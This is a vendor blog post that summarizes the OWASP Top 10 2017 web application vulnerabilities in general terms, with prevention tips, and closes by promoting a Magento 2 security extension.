The OWASP Top 10 vulnerabilities are to provide guidance to developers and security professionals about the critical vulnerabilities that are commonly found in web applications, which can be easily exploited by attackers if the application is not configured properly.
However, OWASP lists all vulnerabilities by prioritizing them according to their severity and detectability.
These vulnerabilities are submitted by more than 40 firms that specialize in application security and an industry survey that was completed by over 500 individual professionals.
WHAT IS NEW IN OWASP TOP 10-2017?
when we compare the vulnerabilities of the years 2013 & 2017, we find two new vulnerabilities that are –
1. Insecure Deserialization
2. Insufficient Logging & Monitoring
And Insecure Direct Object References [2013] is merged with Missing Function Level Access Control [2013] and named Broken Access Control [2017].
1. INJECTION
Injection is on top in both 2013 & 17, It occurs when untrusted data is sent to an interpreter as part of a command or query. Different types are – SQL, NoSQL, OS, and LDAP injection.
Any source of data can play the role of injection vector like environment variables, input parameters, and external and internal web services.
Therefore, Attackers can take advantage of this vulnerability if user-supplied data is not validated, filtered, or sanitized by the developers.
2. BROKEN AUTHENTICATION
Weak implementation of authentication, session management mechanism, and when restrictions are not applied properly on authenticated users.
Using default, weak, guessable credentials, and storing passwords in plain text or without strong encryption can lead to bypass authentication by attackers.
Improper key, and token creation as well as destroying mechanisms, implementation of weak or ineffective credential recovery, and forgot-password processes can lead to Broken Authentication.
3. SENSITIVE DATA EXPOSURE
When data is not handled with proper security at both states in rest and when in transit. As a result, Attackers can take advantage of stealing and can modify it according to them.
Communication over insecure channels (HTTP), storing data in plain text, weak implementation of encryption algorithms, and sharing information over public WiFi can expose sensitive data.
Exploring data can lead to severe crimes like identity theft, Financial fraud, and many more.
4. XML EXTERNAL ENTITIES (XXE)
When applications use the XML format to transmit data between the browser and the server, It can allow an attacker to view files on the application server file system, and to interact with any backend or external systems that the application itself can access.
XML external entity injection vulnerability allows an attacker to interact with an application’s processing of XML data and can be used to request local data or files, remote code execution, and denial of service (DoS) attacks.
5. BROKEN ACCESS CONTROL
Improper enforcement of what authenticated users are allowed to do like when the user can perform a task above its privileges.
For example, if a user is logged in with his own or any other account and able to gain access to the administrator account, he can perform tasks like modifying or deleting other user’s data, and accounts, viewing sensitive information, and can also change the access rights.
Therefore, It is recommended to use an access control matrix to define the access control rules to prevent Broken Access Control.
6. SECURITY MISCONFIGURATION
Security Misconfiguration is found generally when an application security system is managed poorly like –
- using insecure default credentials
- incomplete configuration
- misconfigured HTTP headers
- displaying error messages containing sensitive information like the path of directories, and not updating and upgrading OS, frameworks, and libraries can give an advantage to attackers.
And unauthorized access to files, and directories should be restricted, and unnecessary ports, services, and pages should be disabled.
7. CROSS-SITE SCRIPTING (XSS)
When an attacker is able to execute a malicious script in the victim’s browser, any source of data can play the role of injection vector like environment variables, or input parameters.
XSS can lead to hijacking user sessions, stealing cookies, redirecting victims to websites of their choice, and defacing websites.
It can be exploited easily if user-supplied data is not validated, filtered, or sanitized by the designers.
8. INSECURE DESERIALIZATION
Reassembling a series of bits back into a file or object is known as deserialization. An attacker could provide an object that, when deserialized, gives the attacker access privileges or execute malicious code.
Insecure Deserialization can lead to remote code execution, privilege escalation, and various injection attacks.
9. USING COMPONENTS WITH KNOWN VULNERABILITIES
Applications using vulnerable, unpatched components like frameworks, software modules, and libraries. Attackers can easily exploit known vulnerabilities and it can expose sensitive data, and other vulnerabilities present in the application.
Therefore, Regular security checkups, using updated components can help to prevent this vulnerability.
10. INSUFFICIENT LOGGING & MONITORING
If we are poor at monitoring & maintaining logs then we are allowing attackers to work unnoticed.
If the attacker is unnoticed, they can place a backdoor, maintain persistence, and can also reach other systems in the organization.
However, Sufficient monitoring can help to detect attacks at an earlier stage and logs can help to improve security configurations, detect loopholes, and will also be helpful in forensic analysis.
Conclusion
Web application security is a major concern these days, as the implications of such vulnerabilities can be severe.
However, If You are looking for a secuirty audit service, that identifies vulnerabilities like cross-site scripting, guessable credentials, unattended application security flaws, and other misconfigurations in your e-commerce store, check out the Webkul basic security module.
Check out this Magento 2-based eCommerce store security extension which is customizable.
Need Support?
Thank You for reading this Blog!
For further more interesting blogs, keep in touch with us. If you need any kind of support, simply raise a ticket at https://webkul.uvdesk.com/en/.
You may also visit our Odoo development services and quality Odoo Extensions.
For further help or queries, please contact us or raise a ticket.
Be the first to comment.